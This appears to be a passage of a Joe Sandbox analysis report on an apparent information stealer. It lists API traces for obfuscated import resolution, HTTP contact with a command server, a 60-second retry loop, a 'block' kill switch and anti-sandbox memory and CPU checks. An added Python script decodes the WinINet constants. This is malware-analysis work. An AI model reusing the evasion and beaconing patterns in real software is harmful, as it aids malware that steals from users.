                    • LoadLibraryA.KERNEL32(0118DA08,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA04E
                    • LoadLibraryA.KERNEL32(0118D840,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA060
                    • LoadLibraryA.KERNEL32(0118D870,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA072
                    • LoadLibraryA.KERNEL32(0118D930,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA083
                    • LoadLibraryA.KERNEL32(0118D978,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA095
                    • LoadLibraryA.KERNEL32(0118DA20,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA0A7
                    • LoadLibraryA.KERNEL32(0118DAF8,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA0B8
                    • GetProcAddress.KERNEL32(751E0000,01175190), ref: 003CA0DA
                    • GetProcAddress.KERNEL32(751E0000,0118DD08), ref: 003CA0F2
                    • GetProcAddress.KERNEL32(751E0000,01188B40), ref: 003CA10A
                    • GetProcAddress.KERNEL32(751E0000,0118DD98), ref: 003CA123
                    • GetProcAddress.KERNEL32(751E0000,011750F0), ref: 003CA13B
                    • GetProcAddress.KERNEL32(701C0000,0117A610), ref: 003CA160
                    • GetProcAddress.KERNEL32(701C0000,01174FB0), ref: 003CA179
                    • GetProcAddress.KERNEL32(701C0000,0117A570), ref: 003CA191
                    • GetProcAddress.KERNEL32(701C0000,0118DAC8), ref: 003CA1A9
                    • GetProcAddress.KERNEL32(701C0000,0118DB88), ref: 003CA1C2
                    • GetProcAddress.KERNEL32(701C0000,011750D0), ref: 003CA1DA
                    • GetProcAddress.KERNEL32(701C0000,01174FD0), ref: 003CA1F2
                    • GetProcAddress.KERNEL32(701C0000,0118DB10), ref: 003CA20B
                    • GetProcAddress.KERNEL32(753A0000,011752B0), ref: 003CA22C
                    • GetProcAddress.KERNEL32(753A0000,01174FF0), ref: 003CA244
                    • GetProcAddress.KERNEL32(753A0000,0118DCF0), ref: 003CA25D
                    • GetProcAddress.KERNEL32(753A0000,0118DD50), ref: 003CA275
                    • GetProcAddress.KERNEL32(753A0000,01175270), ref: 003CA28D
                    • GetProcAddress.KERNEL32(76310000,0117A7F0), ref: 003CA2B3
                    • GetProcAddress.KERNEL32(76310000,0117A868), ref: 003CA2CB
                    • GetProcAddress.KERNEL32(76310000,0118DC90), ref: 003CA2E3
                    • GetProcAddress.KERNEL32(76310000,01175290), ref: 003CA2FC
                    • GetProcAddress.KERNEL32(76310000,011752D0), ref: 003CA314
                    • GetProcAddress.KERNEL32(76310000,0117A890), ref: 003CA32C
                    • GetProcAddress.KERNEL32(76910000,0118DD80), ref: 003CA352
                    • GetProcAddress.KERNEL32(76910000,011752F0), ref: 003CA36A
                    • GetProcAddress.KERNEL32(76910000,01188BC0), ref: 003CA382
                    • GetProcAddress.KERNEL32(76910000,0118DBB8), ref: 003CA39B
                    • GetProcAddress.KERNEL32(76910000,0118DCA8), ref: 003CA3B3
                    • GetProcAddress.KERNEL32(76910000,01175010), ref: 003CA3CB
                    • GetProcAddress.KERNEL32(76910000,01175030), ref: 003CA3E4
                    • GetProcAddress.KERNEL32(76910000,0118DB58), ref: 003CA3FC
                    • GetProcAddress.KERNEL32(76910000,0118DAE0), ref: 003CA414
                    • GetProcAddress.KERNEL32(75B30000,01175310), ref: 003CA436
                    • GetProcAddress.KERNEL32(75B30000,0118DC00), ref: 003CA44E
                    • GetProcAddress.KERNEL32(75B30000,0118DCD8), ref: 003CA466
                    • GetProcAddress.KERNEL32(75B30000,0118DD20), ref: 003CA47F
                    • GetProcAddress.KERNEL32(75B30000,0118DBA0), ref: 003CA497
                    • GetProcAddress.KERNEL32(75670000,01175330), ref: 003CA4B8
                    • GetProcAddress.KERNEL32(75670000,011750B0), ref: 003CA4D1
                    • GetProcAddress.KERNEL32(76AC0000,01175070), ref: 003CA4F2
                    • GetProcAddress.KERNEL32(76AC0000,0118DCC0), ref: 003CA50A
                    • GetProcAddress.KERNEL32(6F4E0000,01174F50), ref: 003CA530
                    • GetProcAddress.KERNEL32(6F4E0000,01175110), ref: 003CA548
                    • GetProcAddress.KERNEL32(6F4E0000,01175130), ref: 003CA560
                    • GetProcAddress.KERNEL32(6F4E0000,0118DB70), ref: 003CA579
                    • GetProcAddress.KERNEL32(6F4E0000,01175050), ref: 003CA591
                    • GetProcAddress.KERNEL32(6F4E0000,01175210), ref: 003CA5A9
                    • GetProcAddress.KERNEL32(6F4E0000,01174F70), ref: 003CA5C2
                    • GetProcAddress.KERNEL32(6F4E0000,01174F90), ref: 003CA5DA
                    • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 003CA5F1
                    • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 003CA607
                    • GetProcAddress.KERNEL32(75AE0000,0118DC60), ref: 003CA629
                    • GetProcAddress.KERNEL32(75AE0000,01188AE0), ref: 003CA641
                    • GetProcAddress.KERNEL32(75AE0000,0118DB40), ref: 003CA659
                    • GetProcAddress.KERNEL32(75AE0000,0118DDB0), ref: 003CA672
                    • GetProcAddress.KERNEL32(76300000,01175090), ref: 003CA693
                    • GetProcAddress.KERNEL32(6E7F0000,0118DB28), ref: 003CA6B4
                    • GetProcAddress.KERNEL32(6E7F0000,01175150), ref: 003CA6CD
                    • GetProcAddress.KERNEL32(6E7F0000,0118DBD0), ref: 003CA6E5
                    • GetProcAddress.KERNEL32(6E7F0000,0118DBE8), ref: 003CA6FD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: 6383f7b9e8cfbae68a4be6e69121fdeece06ffb1962837e64f20d18b8ba68a07
                    • Instruction ID: 4bb6e9cd1f57b81c338ee2403ed6a875b4906cc145f0a81b7eccb3901f5db369
                    • Opcode Fuzzy Hash: 6383f7b9e8cfbae68a4be6e69121fdeece06ffb1962837e64f20d18b8ba68a07
                    • Instruction Fuzzy Hash: 1B626BF5502201AFC748EFA9ED88D7637F9F76C241704851AA60DC3269D77DA80AEB13

                    Control-flow Graph

                    control_flow_graph 1033 3b6280-3b630b call 3ca7a0 call 3b47b0 call 3ca740 InternetOpenA StrCmpCA 1040 3b630d 1033->1040 1041 3b6314-3b6318 1033->1041 1040->1041 1042 3b6509-3b6525 call 3ca7a0 call 3ca800 * 2 1041->1042 1043 3b631e-3b6342 InternetConnectA 1041->1043 1062 3b6528-3b652d 1042->1062 1045 3b6348-3b634c 1043->1045 1046 3b64ff-3b6503 InternetCloseHandle 1043->1046 1048 3b635a 1045->1048 1049 3b634e-3b6358 1045->1049 1046->1042 1051 3b6364-3b6392 HttpOpenRequestA 1048->1051 1049->1051 1053 3b6398-3b639c 1051->1053 1054 3b64f5-3b64f9 InternetCloseHandle 1051->1054 1056 3b639e-3b63bf InternetSetOptionA 1053->1056 1057 3b63c5-3b6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1059 3b642c-3b644b call 3c8940 1057->1059 1060 3b6407-3b6427 call 3ca740 call 3ca800 * 2 1057->1060 1067 3b64c9-3b64e9 call 3ca740 call 3ca800 * 2 1059->1067 1068 3b644d-3b6454 1059->1068 1060->1062 1067->1062 1071 3b64c7-3b64ef InternetCloseHandle 1068->1071 1072 3b6456-3b6480 InternetReadFile 1068->1072 1071->1054 1076 3b648b 1072->1076 1077 3b6482-3b6489 1072->1077 1076->1071 1077->1076 1080 3b648d-3b64c5 call 3ca9b0 call 3ca8a0 call 3ca800 1077->1080 1080->1072
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                      • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                    • StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B6303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                    • HttpOpenRequestA.WININET(00000000,GET,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B6385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003B63FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B646D
                    • InternetCloseHandle.WININET(00000000), ref: 003B64EF
                    • InternetCloseHandle.WININET(00000000), ref: 003B64F9
                    • InternetCloseHandle.WININET(00000000), ref: 003B6503
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3749127164-2509457195
                    • Opcode ID: fc97f45a9bb0fdf2832f41c7a2b094de4e0813d26ed7df77efc03b8cb2afa5f2
                    • Instruction ID: 57935fe887dc330a179c915dc9b75f6ca30ed45f3ffea34f32011d032ee37fa3
                    • Opcode Fuzzy Hash: fc97f45a9bb0fdf2832f41c7a2b094de4e0813d26ed7df77efc03b8cb2afa5f2
                    • Instruction Fuzzy Hash: F4717F71A00308ABDB25EB90DC49FEE7778FB44704F108059F209AB591DBB86E85DF52
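The WinINet routines listed above (the multipart POST routine at 3b4880 and the GET routine at 3b6280), the GetProcAddress resolver at 3c9c10 and the Sleep.KERNEL32(0000EA60) call in the 3c5510 routine further down are easier to read once the raw dword arguments are decoded. The Python script below is an added example written for this page; it is not part of Joe Sandbox, of this report, or of the sample. It parses the report's `Name.MODULE(args), ref: ADDR` listing lines (including the indented "Part of subcall function" entries), decodes the WinINet constants (InternetOpenA access type, InternetConnectA service, HttpOpenRequestA flags, InternetSetOptionA option, HttpQueryInfoA level), converts the InternetReadFile chunk size and the Sleep interval, and counts GetProcAddress lookups per module handle. The line-shape regex assumes exactly the listing format shown on this page; the SAMPLE text is a constructed fixture copied from the listings above, and the constant tables hold the documented Windows values.

```python
"""Decode the "APIs" listing of Joe Sandbox function records.

Added example for this report page, not part of Joe Sandbox or of the sample.
SAMPLE is a constructed fixture copied from the listings on this page; the
constant tables hold documented WinINet / kernel32 values.
"""
import re
from collections import Counter

# Line shape: [Part of subcall function ADDR: ]Name.MODULE(arg,...), ref: ADDR
API_LINE = re.compile(r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+: )?"
                      r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]{8})\s*$")

INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {  # HttpOpenRequest dwFlags bits
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
SET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY_INFO = {1: "HTTP_QUERY_CONTENT_TYPE", 5: "HTTP_QUERY_CONTENT_LENGTH",
              19: "HTTP_QUERY_STATUS_CODE"}  # low 16 bits of dwInfoLevel

SAMPLE = """\
• InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
• HttpOpenRequestA.WININET(00000000,GET,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B6385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003B63FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B646D
• Sleep.KERNEL32(0000EA60), ref: 003C5A1B
• GetProcAddress.KERNEL32(76210000,01175550), ref: 003C9C2D
• GetProcAddress.KERNEL32(76210000,011756B0), ref: 003C9C45
• GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 003CA5F1
  • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
"""

def to_int(arg):
    """Hex dword value, or None for '?' and inline strings such as GET."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None

def decode_flags(value, table):
    """Names of the set bits, plus any remainder the table does not know."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([hex(rest)] if rest else [])

def parse_api_line(line):
    """(api, module, [args], ref) for an APIs entry, None for any other line."""
    m = API_LINE.match(line)
    if not m:
        return None
    api, module, argstr, ref = m.groups()
    args = [x.strip() for x in argstr.split(",")] if argstr.strip() else []
    return api, module, args, int(ref, 16)

def describe(api, args):
    """Decoded notes for the WinINet / kernel32 calls seen in this report."""
    a = args + ["?"] * 8            # pad so short listings index safely
    v = [to_int(x) for x in a]      # None where the argument is not a hex dword
    if api == "InternetOpenA":
        return [INTERNET_OPEN_TYPE.get(v[1], "dwAccessType=%s" % a[1])]
    if api == "InternetConnectA":
        return [INTERNET_SERVICE.get(v[5], "dwService=%s" % a[5]), "port=%s" % a[2]]
    if api == "HttpOpenRequestA":
        return ["verb=%s" % a[1]] + decode_flags(v[6] or 0, REQUEST_FLAGS)
    if api == "InternetSetOptionA":
        return [SET_OPTION.get(v[1], "dwOption=%s" % a[1])]
    if api == "HttpQueryInfoA":
        return [QUERY_INFO.get((v[1] or 0) & 0xFFFF, "dwInfoLevel=%s" % a[1])]
    if api == "InternetReadFile":
        return ["chunk=%d bytes" % (v[2] or 0)]
    if api == "Sleep":
        return ["%d ms (%.1f s)" % (v[0] or 0, (v[0] or 0) / 1000)]
    if api == "GetProcAddress" and len(args) > 1:
        # The name is printed only if it was plaintext at call time; a hex
        # pointer means it sat in a buffer the sample built at runtime.
        tag = "name=" if v[1] is None else "name_ptr="
        return ["module=%s" % a[0], tag + a[1]]
    return []

def summarize(text):
    """Ordered (api, ref, notes) entries plus GetProcAddress counts per module handle."""
    calls, per_module = [], Counter()
    for line in text.splitlines():
        parsed = parse_api_line(line)
        if parsed is None:
            continue
        api, _module, args, ref = parsed
        if api == "GetProcAddress" and args:
            per_module[args[0]] += 1
        calls.append((api, ref, describe(api, args)))
    return calls, per_module

if __name__ == "__main__":
    for api, ref, notes in summarize(SAMPLE)[0]:
        print("%08X %-18s %s" % (ref, api, ", ".join(notes)))
```

On the fixture this reports HttpOpenRequestA flags 0x00400100 as INTERNET_FLAG_KEEP_CONNECTION plus INTERNET_FLAG_PRAGMA_NOCACHE, option 0x1F as INTERNET_OPTION_SECURITY_FLAGS, query level 0x13 as HTTP_QUERY_STATUS_CODE, a 1999-byte InternetReadFile chunk and a 60 s Sleep. For GetProcAddress it separates the lookups whose second argument is a runtime pointer (the 0118xxxx / 0117xxxx buffers above) from the two the sandbox could print as plaintext, InternetSetOptionA and HttpQueryInfoA, which is the distinction the String ID of the 3c9c10 record reflects.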

                    Control-flow Graph

                    control_flow_graph 1090 3c5510-3c5577 call 3c5ad0 call 3ca820 * 3 call 3ca740 * 4 1106 3c557c-3c5583 1090->1106 1107 3c5585-3c55b6 call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 1106->1107 1108 3c55d7-3c564c call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1106->1108 1123 3c55bb-3c55d2 call 3ca8a0 call 3ca800 1107->1123 1134 3c5693-3c56a9 call 3caad0 StrCmpCA 1108->1134 1138 3c564e-3c568e call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1108->1138 1123->1134 1139 3c57dc-3c5844 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1134->1139 1140 3c56af-3c56b6 1134->1140 1138->1134 1269 3c5ac3-3c5ac6 1139->1269 1142 3c56bc-3c56c3 1140->1142 1143 3c57da-3c585f call 3caad0 StrCmpCA 1140->1143 1146 3c571e-3c5793 call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1142->1146 1147 3c56c5-3c5719 call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1142->1147 1162 3c5865-3c586c 1143->1162 1163 3c5991-3c59f9 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1143->1163 1146->1143 1246 3c5795-3c57d5 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1146->1246 1147->1143 1168 3c598f-3c5a14 call 3caad0 StrCmpCA 1162->1168 1169 3c5872-3c5879 1162->1169 1163->1269 1198 3c5a28-3c5a91 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1168->1198 1199 3c5a16-3c5a21 Sleep 1168->1199 1175 3c587b-3c58ce call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1169->1175 1176 3c58d3-3c5948 call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 3c594a-3c598a call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1176->1274 1198->1269 1199->1106 1246->1143 1274->1168
                    APIs
                      • Part of subcall function 003CA820: lstrlen.KERNEL32(003B4F05,?,?,003B4F05,003D0DDE), ref: 003CA82B
                      • Part of subcall function 003CA820: lstrcpy.KERNEL32(003D0DDE,00000000), ref: 003CA885
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C56A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5857
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5228
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5318
                      • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C532F
                      • Part of subcall function 003C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003C5364
                      • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C5383
                      • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C53AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5A0C
                    • Sleep.KERNEL32(0000EA60), ref: 003C5A1B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: ad45730601d9dd0c5998603a06b1e725334b1a4e0bcd6f02a921d7db567908ce
                    • Instruction ID: 54d980bb9d910f255f9e6129d7615281ed3b0eb0958e1cb51f41fc8a8079e50b
                    • Opcode Fuzzy Hash: ad45730601d9dd0c5998603a06b1e725334b1a4e0bcd6f02a921d7db567908ce
                    • Instruction Fuzzy Hash: D4E13E729106089BCB16FBA0DC56FFD7738AB54304F50812CB506EA591EF346E4DDBA2

                    Control-flow Graph

                    [Control-flow graph of the function at 003C17A0 (basic blocks 003C17A0 to 003C19CD); graph rendering not reproduced]
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 003C17C5
                    • ExitProcess.KERNEL32 ref: 003C17D1
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: 859542ae4b37a4498cdd0c26b0d678d0134c26fbaab5878e04fc98d9a19e306c
                    • Instruction ID: 58d0ae697dbed3978425a86cb7c6203b096ac3f7622e08b3d5885e067d9ee72a
                    • Opcode Fuzzy Hash: 859542ae4b37a4498cdd0c26b0d678d0134c26fbaab5878e04fc98d9a19e306c
                    • Instruction Fuzzy Hash: 75516AB5A04209EBCB06DFA0D954FBE77BAAF45704F10804DE40AEB241D774ED45EBA2

                    Control-flow Graph

                    [Control-flow graph of the function at 003C7500 (basic blocks 003C7500 to 003C768E); graph rendering not reproduced]
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003C7542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003C757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C760A
                    • wsprintfA.USER32 ref: 003C7640
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\$=
                    • API String ID: 1544550907-3393898382
                    • Opcode ID: e1fd3e55b98d75c55d80ab9675ebad48fc5e9b808390dadb14ed3f3e8aae000a
                    • Instruction ID: 90ce733143e7006e1b3fa7292b20e2f947fd02ead15d49a79da4f873b68ce15c
                    • Opcode Fuzzy Hash: e1fd3e55b98d75c55d80ab9675ebad48fc5e9b808390dadb14ed3f3e8aae000a
                    • Instruction Fuzzy Hash: 634151B1D04258ABDB11DB94DC45FEEBBB8AB18704F10419DF509AB280D7786E44CFA6

                    Control-flow Graph

                    APIs
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181730), ref: 003C98A1
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181508), ref: 003C98BA
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181748), ref: 003C98D2
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181760), ref: 003C98EA
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,011816D0), ref: 003C9903
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01188C70), ref: 003C991B
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01175430), ref: 003C9933
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,011755D0), ref: 003C994C
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181628), ref: 003C9964
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181658), ref: 003C997C
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181640), ref: 003C9995
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181520), ref: 003C99AD
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,011755F0), ref: 003C99C5
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181550), ref: 003C99DE
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003B11D0: ExitProcess.KERNEL32 ref: 003B1211
                      • Part of subcall function 003B1160: GetSystemInfo.KERNEL32(?), ref: 003B116A
                      • Part of subcall function 003B1160: ExitProcess.KERNEL32 ref: 003B117E
                      • Part of subcall function 003B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003B112B
                      • Part of subcall function 003B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
                      • Part of subcall function 003B1110: ExitProcess.KERNEL32 ref: 003B1143
                      • Part of subcall function 003B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
                      • Part of subcall function 003B1220: __aulldiv.LIBCMT ref: 003B1258
